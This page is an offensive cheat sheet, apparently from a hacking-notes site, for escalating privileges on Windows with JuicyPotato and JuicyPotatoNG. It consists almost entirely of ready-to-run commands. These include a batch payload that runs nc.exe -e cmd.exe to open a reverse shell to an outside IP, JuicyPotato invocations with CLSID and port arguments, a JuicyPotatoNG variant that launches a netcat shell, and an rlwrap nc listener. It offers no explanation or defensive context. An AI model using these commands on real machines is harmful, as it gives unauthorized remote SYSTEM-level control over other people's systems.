>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Privilege Escalation / JuicyPotato / JuicyPotatoNG

JuicyPotato / JuicyPotatoNG

Privilege Escalation Windows Tokens windows

Check privileges

whoami /priv
systeminfo

Need SeImpersonatePrivilege.

Pick CLSID for OS version

CLSIDs for the target OS at https://github.com/ohpe/juicy-potato/tree/master/CLSID/

Prepare payload .bat

echo C:\windows\temp\test\nc.exe -e cmd.exe 10.11.134.159 444 > test.bat

Run JuicyPotato

.\JuicyPotato.exe -l 1337 -t * -p test.bat
.\JuicyPotato.exe -t * -p shell.bat -l 444 -c "{03ca98d6-ff5d-49b8-abc6-03dd84127020}" 444

JuicyPotatoNG variant

.\JuicyPotatoNG.exe -t * -p nc.exe -a "192.168.45.165 4445 -e c:\windows\system32\cmd.exe"

Listener

rlwrap nc -lvnp 444